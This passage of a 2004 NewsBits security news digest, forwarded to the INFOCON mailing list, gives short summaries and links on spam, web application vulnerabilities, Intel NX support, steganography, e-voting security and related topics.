the last year. Of those people who have downloaded
films, 17 percent said they are going to the movies
less often, and 26 percent said they bought fewer
DVDs, according to online researcher OTX, which
conducted the study in partnership with the MPAA.
http://zdnet.com.com/2100-1104_2-5262427.html
- - - - - - - - - -
Postini: Half of all e-mail requests rejected
Antispam company Postini Inc. is now rejecting
more than half of all attempts to send e-mail
to its customers, in part because of increased
activity from compromised home computers that
have been turned into "zombies" for sending
unsolicited commercial e-mail. The company
is dropping 53% of all e-mail connections that
use the Simple Mail Transfer Protocol (SMTP)
without reading the content of the e-mail
messages.
http://computerworld.com/softwaretopics/software/groupware/story/0,10801,94378,00.html
- - - - - - - - - -
Web app vulnerabilities on the rise
Nine out of 10 web applications remain vulnerable
to attack even after developers think they have
been 'fixed', security experts have claimed.
A study by security firm Imperva on the vulnerability
of public and private web applications found that,
despite periodic penetration testing and subsequent
fixes, flaws reappeared over time.
http://www.vnunet.com/news/1156498
- - - - - - - - - -
Analyst: UN Needs Warriors in Spam Battle
An international effort can wipe out spam by 2006,
says an agency of the United Nations, the International
Telecommunications Union. The group is sponsoring
an ongoing anti-spam conference in Geneva that has
drawn representatives of more than 60 countries
and global organizations.
http://www.newsfactor.com/story.xhtml?story_title=Analyst--UN-Needs-Warriors-in-Spam-Battle
- - - - - - - - - -
Intel to add NX security to Pentium 4 in Q4
Intel will add support for Microsoft's No Execute (NX)
security technology to its P4 CPUs in Q4, reports suggest.
Taiwanese motherboard maker sources cited by DigiTimes
claim the chip giant will introduce support for NX from
the end of Q3. A BIOS update will be all that's required
to enable support at the mobo level, they add.
http://www.theregister.co.uk/2004/07/08/intel_nx_support/
- - - - - - - - - -
Fujitsu technique hides data in images
Fujitsu has developed a method of embedding data
invisibly within printed pictures. The procedure,
commonly known as steganography, will allow
numerical information to be hidden within a color
image and accessed via a camera. Steganograghy
involves altering an image in a way that cannot
be perceived by the human eye, but which can
be detected electronically. Fujitsu's technique
can apparently hide a 12-digit number in a
1-centimeter square.
http://zdnet.com.com/2100-1103_2-5260241.html
- - - - - - - - - -
Investigating digital images
What's real and what's phony? "Seeing is no longer
believing. Actually, what you see is largely irrelevant,"
says Dartmouth Professor Hany Farid. He is referring
to the digital images that appear everywhere: in
newspapers, on Web sites, in advertising, and in
business materials, for example. Farid and Dartmouth
graduate student Alin Popescu have developed a
mathematical technique to tell the difference between
a "real" image and one that's been fiddled with.
http://www.dartmouth.edu/~news/releases/2004/07/01.html
- - - - - - - - - -
Spam can hurt in more ways than one
Small businesses that depend heavily on the Web and
e-mail to market products are increasingly caught in
a spam squeeze. Hackers and spammers hijack their PCs
­ and then Internet providers wrongly shut down the
victims' e-mail.
http://www.usatoday.com/tech/news/2004-07-07-spam_x.htm
- - - - - - - - - -
E-voting security: getting it right
As we noted in our previous story - E-voting security:
looking good on paper? - the much-celebrated voter
verifiable paper trail is useless as a security measure
for Direct Recording Electronic (DRE) election systems,
and actually introduces far more problems than it solves.
http://www.theregister.co.uk/2004/07/08/getting_e-voting_security_right/

Wash. state announces safeguards for electronic voting
http://www.usatoday.com/tech/news/techpolicy/2004-07-08-wash-evote_x.htm
- - - - - - - - - -
Security spending rises, as do risks
IT security spending across the world is rising, but
so are virus and malicious code attacks. The findings
from the Global Information Security Survey, conducted
by vnunet.com's sister magazine Computing and its
international sister publications, shows businesses
are not following best practice security advice,
but are increasing security budgets to cope with
growing threats.
http://www.vnunet.com/news/1156507
- - - - - - - - - -
Service Pack Deux?
Microsoft should make SP2 available to all users
and backport the changes to older operating systems,
or they risk putting profits ahead of security yet
again. As some of you may have guessed by now, one
of my side interests when I'm not sitting in front
of a computer is the study of history.
http://www.securityfocus.com/columnists/254
- - - - - - - - - -
Reducing the risk from P2P downloads
Each week vnunet.com asks a different expert
to give their views on recent virus and security
issues, with advice, warnings and information on
the latest threats. This week Frank Coggrave, UK
regional director of Websense, examines the legal
implications for businesses and IT directors of
employee use of P2P networks.
http://www.vnunet.com/news/1156524
- - - - - - - - - -
Terrorists rely on tech tools, researcher finds
The Internet has become the new Afghanistan for
terrorist training, recruitment, and fundraising,
an academic said. Terrorist groups are exploiting
the accessibility, vast audience, and anonymity
of the Internet to raise money and recruit new
members, said Gabriel Weimann, chairman of the
communications department at the University of
Haifa in Israel. The number of terrorists' Web
sites has increased by 571% in the past seven
years, Weimann says.
http://computerworld.com/securitytopics/security/story/0,10801,94390,00.html
***********************************************************
Search the NewsBits.net Archive at:
http://www.newsbits.net/search.html
***********************************************************
The source material may be copyrighted and all rights are
retained by the original author/publisher. The information
is provided to you for non-profit research and educational
purposes. Reproduction of this text is encouraged; however
copies may not be sold, and NewsBits (www.newsbits.net)
should be cited as the source of the information.
Copyright 2000-2004, NewsBits.net, Campbell, CA.
_____________________________________________________________________
Asst. Chief Ron Levine (Acting) | Voice (650)949-7339
Foothill-DeAnza College Dist. Police | FAX (650)941-4963
12345 El Monte Road | Pager (888)399-7369
Los Altos Hills, CA 94022 | mailto:rlevine@ix.netcom.com
---------------------------------------------------------------------
Visit the Foothill-DeAnza College Dist. Police Web Site at
http://www.foothill.fhda.edu/police/
---------------------------------------------------------------------

------------------------------------------------------------------------
Information is the currency of victory on the battlefield.
GEN Gordon Sullivan, CSA (1993)
------------------------------------------------------------------------

INFOCON Mailing List @
IWS - The Information Warfare Site
http://www.iwar.org.uk

------------------------------------------------------------------------
To subscribe, change your subscription or unsubscribe go to http://www.iwar.org.uk/mailman/listinfo/infocon/


Get Firefox!